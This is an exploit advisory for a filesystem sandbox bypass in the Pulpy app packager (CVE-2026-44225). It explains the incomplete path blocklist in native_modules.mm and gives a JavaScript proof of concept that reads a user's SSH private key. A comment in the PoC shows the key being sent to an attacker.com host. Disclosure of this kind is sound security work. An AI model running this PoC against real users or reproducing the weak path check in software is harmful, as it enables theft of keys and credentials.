# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass # Google Dork: N/A # Date: 2026-06-19 # Exploit Author: Onur BILICI @basekill # Vendor Homepage: https://github.com/enesgkky/pulpy # Software Link: https://github.com/enesgkky/pulpy # Version: <= 0.1.1-Beta # Tested on: macOS, Linux # CVE: CVE-2026-44225 Description: Pulpy injects a 'pulpy.fs' JavaScript API into every packaged web application, granting it access to the host filesystem. A 'validateFsPath()' function is implemented to sandbox this access using a blocklist. However, this blocklist is incomplete. The implementation only catches root-level paths (e.g., matching "/Library/" at index 0), meaning it completely misses user-specific paths such as "/Users//Library/" or critical configuration directories like "~/.ssh/", "~/.aws/", and "~/Documents/". As a result, any malicious web application packaged with Pulpy can bypass the sandbox to read and write arbitrary sensitive files in the user's home directory. Root Cause Analysis: In 'src/bridge/native_modules.mm', the path validation logic relies on a weak prefix check: std::string normalized = fs::weakly_canonical(p).string(); if (normalized.find("/etc/") == 0 || normalized.find("/var/") == 0 || normalized.find("/usr/") == 0 || normalized.find("/System/") == 0 || normalized.find("/Library/") == 0) { return ""; } return normalized; Proof of Concept (PoC): An attacker can execute the following JavaScript code within a Pulpy-packaged application to exfiltrate sensitive user data: ```javascript // Bypassing the sandbox to read sensitive files from the user's home directory try { // Example target: SSH private key // Note: You need to replace '' with the target's actual username or dynamically resolve it const sshKeyPath = "/Users//.ssh/id_rsa"; pulpy.fs.readFile(sshKeyPath, 'utf8', (err, data) => { if (err) { console.error("Failed to read file:", err); return; } console.log("Successfully bypassed sandbox! Content:\n", data); // Exfiltration logic can be placed here (e.g., fetch('[https://attacker.com/log](https://attacker.com/log)', {method: 'POST', body: data})) }); } catch (e) { console.error("Exploit failed:", e); }